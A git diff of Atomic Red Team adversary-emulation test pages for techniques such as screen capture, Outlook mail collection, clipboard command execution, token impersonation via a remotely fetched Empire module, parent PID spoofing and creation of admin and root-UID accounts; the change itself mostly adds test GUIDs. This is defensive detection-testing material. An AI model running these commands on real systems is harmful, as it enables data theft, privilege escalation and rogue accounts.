## Atomic Test #6 - Change Powershell Execution Policy to Bypass + +auto_generated_guid: f3a6cceb-06c9-48e5-8df8-8867a6814245 + Attackers need to change the powershell execution policy in order to run their malicious powershell scripts. They can either specify it during the execution of the powershell script or change the registry value for it. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | default_execution_policy | Specify the default poweshell execution policy | String | Default| diff --git a/atomics/T1113/T1113.md b/atomics/T1113/T1113.md index 20adce62..a2cd69a4 100644 --- a/atomics/T1113/T1113.md +++ b/atomics/T1113/T1113.md @@ -19,15 +19,17 @@
## Atomic Test #1 - Screencapture -Use screencapture command to collect a full desktop screenshot +auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac + +Use screencapture command to collect a full desktop screenshot **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Output file path | Path | /tmp/T1113_desktop.png| @@ -52,15 +54,17 @@ rm #{output_file}
## Atomic Test #2 - Screencapture (silent) -Use screencapture command to collect a full desktop screenshot +auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 + +Use screencapture command to collect a full desktop screenshot **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Output file path | Path | /tmp/T1113_desktop.png| @@ -85,15 +89,17 @@ rm #{output_file}
## Atomic Test #3 - X Windows Capture -Use xwd command to collect a full desktop screenshot and review file with xwud +auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac + +Use xwd command to collect a full desktop screenshot and review file with xwud **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Output file path | Path | /tmp/T1113_desktop.xwd| | package_checker | Package checking command for linux. Debian system command- dpkg -s x11-apps | string | rpm -q xorg-x11-apps| @@ -119,7 +125,7 @@ rm #{output_file} ##### Description: Package with XWD and XWUD must exist on device ##### Check Prereq Commands: ```bash -if #{package_checker} > /dev/null; then exit 0; else exit 1; fi +if #{package_checker} > /dev/null; then exit 0; else exit 1; fi ``` ##### Get Prereq Commands: ```bash @@ -133,15 +139,17 @@ sudo #{package_installer}
## Atomic Test #4 - Capture Linux Desktop using Import Tool -Use import command from ImageMagick to collect a full desktop screenshot +auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1 + +Use import command from ImageMagick to collect a full desktop screenshot **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Output file path | Path | /tmp/T1113_desktop.png| @@ -164,7 +172,7 @@ rm #{output_file} ##### Description: ImageMagick must be installed ##### Check Prereq Commands: ```bash -if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi +if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi ``` ##### Get Prereq Commands: ```bash @@ -178,15 +186,17 @@ sudo apt-get -y install graphicsmagick-imagemagick-compat
## Atomic Test #5 - Windows Screencapture -Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour +auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153 + +Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Output file path | Path | c:\temp\T1113_desktop.zip| | recording_time | Time to take screenshots | String | 5| diff --git a/atomics/T1114.001/T1114.001.md b/atomics/T1114.001/T1114.001.md index 6e5aa9a7..55f5e0c4 100644 --- a/atomics/T1114.001/T1114.001.md +++ b/atomics/T1114.001/T1114.001.md @@ -12,18 +12,20 @@ Outlook stores data locally in offline data files with an extension of .ost. Out
## Atomic Test #1 - Email Collection with PowerShell Get-Inbox + +auto_generated_guid: 3f1b5096-0139-4736-9b78-19bcb02bb1cb + Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration. Successful execution will produce stdout message stating "Please be patient, this may take some time...". Upon completion, final output will be a mail.csv file. Note: Outlook is required, but no email account necessary to produce artifacts. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Output file path | String | $env:TEMP\mail.csv| | file_path | File path for Get-Inbox.ps1 | String | PathToAtomicsFolder\T1114.001\src| @@ -47,7 +49,7 @@ Remove-Item #{output_file} -Force -ErrorAction Ignore ##### Description: Get-Inbox.ps1 must be located at #{file_path} ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit 1} +if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1115/T1115.md b/atomics/T1115/T1115.md index cc5c2a7a..4967809c 100644 --- a/atomics/T1115/T1115.md +++ b/atomics/T1115/T1115.md @@ -18,8 +18,10 @@ In Windows, Applications can access clipboard data by using the Windows API.(Cit
## Atomic Test #1 - Utilize Clipboard to store or execute commands from -Add data to clipboard to copy off or execute commands from. +auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7 + +Add data to clipboard to copy off or execute commands from. **Supported Platforms:** Windows @@ -48,8 +50,10 @@ del %temp%\T1115.txt >nul 2>&1
## Atomic Test #2 - Execute Commands from Clipboard using PowerShell -Utilize PowerShell to echo a command to clipboard and execute it +auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416 + +Utilize PowerShell to echo a command to clipboard and execute it **Supported Platforms:** Windows @@ -73,8 +77,10 @@ Get-Clipboard | iex
## Atomic Test #3 - Execute commands from clipboard -Echo a command to clipboard and execute it +auto_generated_guid: 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff + +Echo a command to clipboard and execute it **Supported Platforms:** macOS @@ -98,15 +104,17 @@ $(pbpaste)
## Atomic Test #4 - Collect Clipboard Data via VBA -This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt +auto_generated_guid: 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52 + +This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | ms_product | Maldoc application Word | String | Word| @@ -137,7 +145,7 @@ try { $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} Stop-Process -Name $process exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1119/T1119.md b/atomics/T1119/T1119.md index ac5f303f..90f0a4d8 100644 --- a/atomics/T1119/T1119.md +++ b/atomics/T1119/T1119.md @@ -18,9 +18,11 @@ This technique may incorporate use of other techniques such as [File and Directo
## Atomic Test #1 - Automated Collection Command Prompt + +auto_generated_guid: cb379146-53f1-43e0-b884-7ce2c635ff5b + Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_command_prompt_collection to see what was collected. - **Supported Platforms:** Windows @@ -49,9 +51,11 @@ del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1
## Atomic Test #2 - Automated Collection PowerShell + +auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313 + Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_powershell_collection to see what was collected. - **Supported Platforms:** Windows @@ -79,9 +83,11 @@ Remove-Item $env:TEMP\T1119_powershell_collection -Force -ErrorAction Ignore | O
## Atomic Test #3 - Recon information for export with PowerShell + +auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26 + collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt to see what was collected. - **Supported Platforms:** Windows @@ -112,9 +118,11 @@ Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore
## Atomic Test #4 - Recon information for export with Command Prompt + +auto_generated_guid: aa1180e2-f329-4e1e-8625-2472ec0bfaf3 + collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt to see what was collected. - **Supported Platforms:** Windows diff --git a/atomics/T1120/T1120.md b/atomics/T1120/T1120.md index 4a4a879a..a1d5580a 100644 --- a/atomics/T1120/T1120.md +++ b/atomics/T1120/T1120.md @@ -10,8 +10,10 @@
## Atomic Test #1 - Win32_PnPEntity Hardware Inventory -Perform peripheral device discovery using Get-WMIObject Win32_PnPEntity +auto_generated_guid: 2cb4dbf2-2dca-4597-8678-4d39d207a3a5 + +Perform peripheral device discovery using Get-WMIObject Win32_PnPEntity **Supported Platforms:** Windows diff --git a/atomics/T1123/T1123.md b/atomics/T1123/T1123.md index 89a3dc0d..ea593f6a 100644 --- a/atomics/T1123/T1123.md +++ b/atomics/T1123/T1123.md @@ -12,8 +12,10 @@ Malware or scripts may be used to interact with the devices through an available
## Atomic Test #1 - using device audio capture commandlet -[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet) +auto_generated_guid: 9c3ad250-b185-4444-b5a9-d69218a10c95 + +[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet) **Supported Platforms:** Windows diff --git a/atomics/T1124/T1124.md b/atomics/T1124/T1124.md index f9a8e3d2..13cc9567 100644 --- a/atomics/T1124/T1124.md +++ b/atomics/T1124/T1124.md @@ -16,15 +16,17 @@ This information could be useful for performing other techniques, such as execut
## Atomic Test #1 - System Time Discovery -Identify the system time. Upon execution, the local computer system time and timezone will be displayed. +auto_generated_guid: 20aba24b-e61f-4b26-b4ce-4784f763ca20 + +Identify the system time. Upon execution, the local computer system time and timezone will be displayed. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | computer_name | computer name to query | string | localhost| @@ -46,8 +48,10 @@ w32tm /tz
## Atomic Test #2 - System Time Discovery - PowerShell -Identify the system time via PowerShell. Upon execution, the system time will be displayed. +auto_generated_guid: 1d5711d6-655c-4a47-ae9c-6503c74fa877 + +Identify the system time via PowerShell. Upon execution, the system time will be displayed. **Supported Platforms:** Windows diff --git a/atomics/T1127.001/T1127.001.md b/atomics/T1127.001/T1127.001.md index 26dad271..750799b6 100644 --- a/atomics/T1127.001/T1127.001.md +++ b/atomics/T1127.001/T1127.001.md @@ -14,15 +14,17 @@ Adversaries can abuse MSBuild to proxy execution of malicious code. The inline t
## Atomic Test #1 - MSBuild Bypass Using Inline Tasks (C#) -Executes the code in a project file using msbuild.exe. The default C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen. +auto_generated_guid: 58742c0f-cb01-44cd-a60b-fb26e8871c93 + +Executes the code in a project file using msbuild.exe. The default C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | filename | Location of the project file | Path | PathToAtomicsFolder\T1127.001\src\T1127.001.csproj| | msbuildpath | Default location of MSBuild | Path | C:\Windows\Microsoft.NET\Framework\v4.0.30319| @@ -43,7 +45,7 @@ Executes the code in a project file using msbuild.exe. The default C# project ex ##### Description: Project file must exist on disk at specified location (#(unknown)) ##### Check Prereq Commands: ```powershell -if (Test-Path #(unknown)) {exit 0} else {exit 1} +if (Test-Path #(unknown)) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -58,15 +60,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - MSBuild Bypass Using Inline Tasks (VB) -Executes the code in a project file using msbuild.exe. The default Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen. +auto_generated_guid: ab042179-c0c5-402f-9bc8-42741f5ce359 + +Executes the code in a project file using msbuild.exe. The default Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | filename | Location of the project file | Path | PathToAtomicsFolder\T1127.001\src\vb.xml| | msbuildpath | Default location of MSBuild | Path | C:\Windows\Microsoft.NET\Framework\v4.0.30319| @@ -87,7 +91,7 @@ Executes the code in a project file using msbuild.exe. The default Visual Basic ##### Description: Project file must exist on disk at specified location (#(unknown)) ##### Check Prereq Commands: ```powershell -if (Test-Path #(unknown)) {exit 0} else {exit 1} +if (Test-Path #(unknown)) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1132.001/T1132.001.md b/atomics/T1132.001/T1132.001.md index 0fcad8c1..d0c7e284 100644 --- a/atomics/T1132.001/T1132.001.md +++ b/atomics/T1132.001/T1132.001.md @@ -10,15 +10,17 @@
## Atomic Test #1 - Base64 Encoded data. -Utilizing a common technique for posting base64 encoded data. +auto_generated_guid: 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 + +Utilizing a common technique for posting base64 encoded data. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | destination_url | Destination URL to post encoded data. | string | redcanary.com| | base64_data | Encoded data to post using fake Social Security number 111-11-1111. | string | MTExLTExLTExMTE=| diff --git a/atomics/T1133/T1133.md b/atomics/T1133/T1133.md index 5a22a3b7..8129da91 100644 --- a/atomics/T1133/T1133.md +++ b/atomics/T1133/T1133.md @@ -14,15 +14,17 @@ Access may also be gained through an exposed service that doesn’t require auth
## Atomic Test #1 - Running Chrome VPN Extensions via the Registry 2 vpn extension -Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list +auto_generated_guid: 4c8db261-a58b-42a6-a866-0a294deedde4 + +Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | chrome_url | chrome installer download URL | url | https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe| | extension_id | chrome extension id | String | "fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme"| @@ -54,7 +56,7 @@ Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extensio ##### Description: Chrome must be installed ##### Check Prereq Commands: ```powershell -if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} +if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1134.001/T1134.001.md b/atomics/T1134.001/T1134.001.md index 031d8e3a..1a8ba916 100644 --- a/atomics/T1134.001/T1134.001.md +++ b/atomics/T1134.001/T1134.001.md @@ -14,11 +14,13 @@ An adversary may do this when they have a specific, existing process they want t
## Atomic Test #1 - Named pipe client impersonation + +auto_generated_guid: 90db9e27-8e7c-4c04-b602-a45927884966 + Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script creates a named pipe, and a service that writes to that named pipe. When the service connects to the named pipe, the script impersonates its security context. When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM). Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ - **Supported Platforms:** Windows @@ -42,9 +44,11 @@ IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f
## Atomic Test #2 - `SeDebugPrivilege` token duplication + +auto_generated_guid: 34f0a430-9d04-4d98-bcb5-1989f14719f0 + Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script uses `SeDebugPrivilege` to obtain, duplicate and impersonate the token of a another process. When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM). - **Supported Platforms:** Windows diff --git a/atomics/T1134.004/T1134.004.md b/atomics/T1134.004/T1134.004.md index 56fae58f..93157b9e 100644 --- a/atomics/T1134.004/T1134.004.md +++ b/atomics/T1134.004/T1134.004.md @@ -22,19 +22,21 @@ Explicitly assigning the PPID may also enable elevated privileges given appropri
## Atomic Test #1 - Parent PID Spoofing using PowerShell + +auto_generated_guid: 069258f4-2162-46e9-9a25-c9c6c56150d2 + This test uses PowerShell to replicates how Cobalt Strike does ppid spoofing and masquerade a spawned process. Upon execution, "Process C:\Program Files\Internet Explorer\iexplore.exe is spawned with pid ####" will be displayed and calc.exe will be launched. Credit to In Ming Loh (https://github.com/countercept/ppid-spoofing/blob/master/PPID-Spoof.ps1) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | parent_process_name | Name of the parent process | string | explorer| | spawnto_process_path | Path of the process to spawn | path | C:\Program Files\Internet Explorer\iexplore.exe| @@ -64,7 +66,7 @@ Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore ##### Description: DLL to inject must exist on disk at specified location (#{dll_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{dll_path}) {exit 0} else {exit 1} +if (Test-Path #{dll_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -79,15 +81,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Parent PID Spoofing - Spawn from Current Process -Spawns a powershell.exe process as a child of the current process. +auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25 + +Spawns a powershell.exe process as a child of the current process. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_path | File path or name of process to spawn | path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe| | parent_pid | PID of process to spawn from | string | $PID| @@ -110,7 +114,7 @@ Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{comma ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -124,15 +128,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #3 - Parent PID Spoofing - Spawn from Specified Process -Spawns a notepad.exe process as a child of the current process. +auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb + +Spawns a notepad.exe process as a child of the current process. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | parent_pid | PID of process to spawn from | string | $PID| | test_guid | Defined test GUID | string | 12345678-1234-1234-1234-123456789123| @@ -154,7 +160,7 @@ Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_gu ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -168,15 +174,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #4 - Parent PID Spoofing - Spawn from svchost.exe -Spawnd a process as a child of the first accessible svchost.exe process. +auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591 + +Spawnd a process as a child of the first accessible svchost.exe process. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_line | Specified command line to use | string | -Command Start-Sleep 10| | file_path | File path or name of process to spawn | path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe| @@ -198,7 +206,7 @@ Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -212,15 +220,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #5 - Parent PID Spoofing - Spawn from New Process -Creates a notepad.exe process and then spawns a powershell.exe process as a child of it. +auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db + +Creates a notepad.exe process and then spawns a powershell.exe process as a child of it. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_line | Specified command line to use | string | -Command Start-Sleep 10| | file_path | File path or name of process to spawn | path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe| @@ -243,7 +253,7 @@ Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecific ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md index 102c0d90..1bd8f520 100644 --- a/atomics/T1135/T1135.md +++ b/atomics/T1135/T1135.md @@ -22,15 +22,17 @@ File sharing over a Windows network occurs over the SMB protocol. (Citation: Wik
## Atomic Test #1 - Network Share Discovery -Network Share Discovery +auto_generated_guid: f94b5ad9-911c-4eff-9718-fd21899db4f7 + +Network Share Discovery **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | computer_name | Computer name to find a mount on. | string | computer1| @@ -53,15 +55,17 @@ showmount #{computer_name}
## Atomic Test #2 - Network Share Discovery - linux -Network Share Discovery using smbstatus +auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae + +Network Share Discovery using smbstatus **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | package_checker | Package checking command. Debian - dpkg -s samba | string | rpm -q samba| | package_installer | Package installer command. Debian - apt install samba | string | yum install -y samba| @@ -81,7 +85,7 @@ smbstatus --shares ##### Description: Package with smbstatus (samba) must exist on device ##### Check Prereq Commands: ```bash -if #{package_checker} > /dev/null; then exit 0; else exit 1; fi +if #{package_checker} > /dev/null; then exit 0; else exit 1; fi ``` ##### Get Prereq Commands: ```bash @@ -95,16 +99,18 @@ sudo #{package_installer}
## Atomic Test #3 - Network Share Discovery command prompt + +auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb + Network Share Discovery utilizing the command prompt. The computer name variable may need to be modified to point to a different host Upon execution avalaible network shares will be displayed in the powershell session - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | computer_name | Computer name to find a mount on. | string | localhost| @@ -125,9 +131,11 @@ net view \\#{computer_name}
## Atomic Test #4 - Network Share Discovery PowerShell + +auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb + Network Share Discovery utilizing PowerShell. The computer name variable may need to be modified to point to a different host Upon execution, avalaible network shares will be displayed in the powershell session - **Supported Platforms:** Windows @@ -150,8 +158,10 @@ get-smbshare
## Atomic Test #5 - View available share drives -View information about all of the resources that are shared on the local computer Upon execution, avalaible share drives will be displayed in the powershell session +auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae + +View information about all of the resources that are shared on the local computer Upon execution, avalaible share drives will be displayed in the powershell session **Supported Platforms:** Windows @@ -174,8 +184,10 @@ net share
## Atomic Test #6 - Share Discovery with PowerView -Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed. +auto_generated_guid: b1636f0a-ba82-435c-b699-0d78794d8bfd + +Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed. **Supported Platforms:** Windows diff --git a/atomics/T1136.001/T1136.001.md b/atomics/T1136.001/T1136.001.md index ed13f916..5a814eb8 100644 --- a/atomics/T1136.001/T1136.001.md +++ b/atomics/T1136.001/T1136.001.md @@ -22,15 +22,17 @@ Such accounts may be used to establish secondary credentialed access that do not
## Atomic Test #1 - Create a user account on a Linux system -Create a user via useradd +auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2 + +Create a user via useradd **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | username | Username of the user to create | String | evil_user| @@ -55,15 +57,17 @@ userdel #{username}
## Atomic Test #2 - Create a user account on a MacOS system -Creates a user on a MacOS system with dscl +auto_generated_guid: 01993ba5-1da3-4e15-a719-b690d4f0f0b2 + +Creates a user on a MacOS system with dscl **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | username | Username of the user to create | String | evil_user| | realname | 'realname' to record when creating the user | String | Evil Account| @@ -94,16 +98,18 @@ dscl . -delete /Users/#{username}
## Atomic Test #3 - Create a new user in a command prompt + +auto_generated_guid: 6657864e-0323-4206-9344-ac9cd7265a4f + Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. To verify the new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_CMD" - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | username | Username of the user to create | String | T1136.001_CMD| | password | Password of the user to create | String | T1136.001_CMD!| @@ -129,16 +135,18 @@ net user /del "#{username}" >nul 2>&1
## Atomic Test #4 - Create a new user in PowerShell + +auto_generated_guid: bc8be0ac-475c-4fbf-9b1d-9fffd77afbde + Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_PowerShell" - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | username | Username of the user to create | String | T1136.001_PowerShell| @@ -163,15 +171,17 @@ Remove-LocalUser -Name "#{username}" -ErrorAction Ignore
## Atomic Test #5 - Create a new user in Linux with `root` UID and GID. -Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. +auto_generated_guid: a1040a30-d28b-4eda-bd99-bb2861a4616c + +Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | username | Username of the user to create | String | butter| | password | Password of the user to create | String | BetterWithButter| @@ -198,15 +208,17 @@ userdel #{username}
## Atomic Test #6 - Create a new Windows admin user -Creates a new admin user in a command prompt. +auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559 + +Creates a new admin user in a command prompt. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | username | Username of the user to create | String | T1136.001_Admin| | password | Password of the user to create | String | T1136_pass| diff --git a/atomics/T1136.002/T1136.002.md b/atomics/T1136.002/T1136.002.md index cf70f9c5..698235a2 100644 --- a/atomics/T1136.002/T1136.002.md +++ b/atomics/T1136.002/T1136.002.md @@ -16,15 +16,17 @@ Such accounts may be used to establish secondary credentialed access that do not
## Atomic Test #1 - Create a new Windows domain admin user -Creates a new domain admin user in a command prompt. +auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62 + +Creates a new domain admin user in a command prompt. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | username | Username of the user to create | String | T1136.002_Admin| | password | Password of the user to create | String | T1136_pass123!| @@ -52,15 +54,17 @@ net user "#{username}" >nul 2>&1 /del /domain
